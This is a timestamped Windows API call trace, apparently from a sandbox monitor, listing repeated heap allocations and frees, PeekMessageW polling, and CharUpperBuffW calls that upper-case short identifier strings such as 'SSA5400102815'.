[0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x182e1) returned 0x34b2250 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.925] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.925] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0262.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.926] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.926] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.928] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.929] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0262.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.930] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.931] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.931] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.931] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.932] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.932] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.932] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.932] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.933] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.933] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.933] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.934] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.935] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.935] 